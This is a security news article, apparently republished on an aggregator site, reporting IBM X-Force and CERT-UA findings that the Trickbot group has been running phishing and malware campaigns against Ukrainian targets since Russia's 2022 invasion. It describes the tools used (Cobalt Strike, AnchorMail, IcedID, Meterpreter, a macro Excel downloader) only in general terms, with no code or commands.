In Switch, Trickbot Group Now Attacking Ukrainian Targets

Latest campaigns are a break from its usual financially motivated attacks and appear aligned with Russian interests, security researchers say.

In a break from precedent, Russias hitherto purely financially motivated Trickbot threat group has systematically been attacking targets in Ukraine over the past three months, apparently in support of Russian government interests in the region.
Researchers from IBMs X-Force threat intelligence group this week said they had uncovered two campaigns — and analyzed four others that Ukraine’s Computer Emergency Response Team (CERT-UA) disclosed — where Trickbot went after targets in Ukraine. The campaigns began after Russia’s invasion of Ukraine in February and have targeted Ukrainian state authorities, government organizations, specific individuals, and the general population. Several of the attacks have involved phishing emails with various themes designed to grab the attention of Ukrainian users — included some that are war-related.
The attacks highlight an unprecedented shift for Trickbot, and its notable because threat groups in former Soviet Union states have typically avoided attacking targets in each other’s countries, IBM said.
Prior to the Russian invasion, ITG23, which is the name by which IBM tracks Trickbot, had not been known to target Ukraine. Much of the groups malware was even configured to not execute on systems if the Ukrainian language was detected, IBM said in a report summarizing its findings this week. ITG23s campaigns against Ukraine are notable due to the extent to which this activity differs from historical precedent and the fact that these campaigns appeared specifically aimed at Ukraine with some payloads that suggest a higher degree of target selection.
IBM said it has observed Trickbot distributing several known malware tools such as IcedID, Cobalt Strike, AnchorMail, and Meterpreter in its attacks on Ukrainian targets. Some of the attacks involved the use of new tools such as a malicious Excel downloader, a self-extracting archive for dropping various malware payloads and a new malware encryption and obfuscation tool.
One of the two Trickbot campaigns that IBM uncovered was in early May. In those attacks, IBM observed the threat actor using a weaponized Excel file to download its AnchorMail backdoor on compromised systems. AnchorMail is a revamped version of Trickbot’s AnchorDNS, a backdoor that members of the closely affiliated Conti group have been using to deploy Conti ransomware. IBM X-Force researchers have previously described the malware as notable for
communicating with its command-and-control (C2) server
using the DNS protocol.
The second recent Trickbot campaign that IBM X-Force researchers spotted occurred likely in late May or early June. In that campaign, Trickbot actors used an
ISO image file
— or archive file containing the contents of an optical disk — as part of an attack chain to drop the Cobalt Strike post-exploit attack kit on target system. In June, Trickbot users were observed exploiting the so-called
“Follina” zero-day bug
in the Windows Microsoft Support Diagnostic Tool (MSDT) to deploy Cobalt Strike.
The campaigns that CERT-UA disclosed, and which IBM X-Force researchers analyzed, involved Trickbot attempts to deploy IcedID, a banking Trojan turned malware distributor;
Metasploit attack payload, Meterpreter
; and
Cobalt Strike
. In five of the six observed campaigns, Trickbot actors directly downloaded Cobalt Strike, AnchorMail, or Meterpreter on target systems — another break from their usual habit of deploying these tools as secondary payloads. IBM said the switch suggests these attacks are part of targeted campaigns during which ITG23 is willing to immediately deploy higher-value backdoors.
IBM described the new malicious Excel downloader that Trickbot is using in the Ukrainian attacks as designed to download malware from a hard-coded URL. The downloader is stored as a macro within the Excel file and runs automatically if the file is opened — provided the user has macros enabled. The new dropper for AnchorMail that IBM observed is in the form of a WinRAR Self Extracting Archive. The dropper is rigged to extract and execute a script for building and configuring AnchorMail on infected systems.
Trickbot is a highly successful threat group that has been around since at least 2016. The group initially used its eponymously named malware to steal credentials to banking accounts. Over the years, the
group evolved
into a sort of initial access broker and a distributor for several ransomware and malware tools, most notably Conti and Ryuk and Emotet. Trickbot is used variously for stealing data, enabling cryptomining, enumerating systems, and other malicious activities.
Court documents in connection with the arrest of a key member of the group last year showed
that nearly 20 cybercriminals
— including several malware experts — collaborated in building the malware. A massive 2020 international law enforcement operation to
take the threat actor down
temporarily disrupted its activities but failed to stop them.

Last News
▸ ArcSight prepares for future at user conference post HP acquisition. ◂ Discovered: 07/01/2025 Category: security	▸ Samsung Epic 4G: First To Use Media Hub ◂ Discovered: 07/01/2025 Category: security	▸ Many third-party software fails security tests ◂ Discovered: 07/01/2025 Category: security

**Cyber Security Categories**
Google Dorks Database	Exploits Vulnerability	Exploit Shellcodes

CVE List

Tools/Apps

News/Aarticles

Phishing Database

Deepfake Detection

Trends/Statistics & Live Infos

Tags:
In Switch, Trickbot Group Now Attacking Ukrainian Targets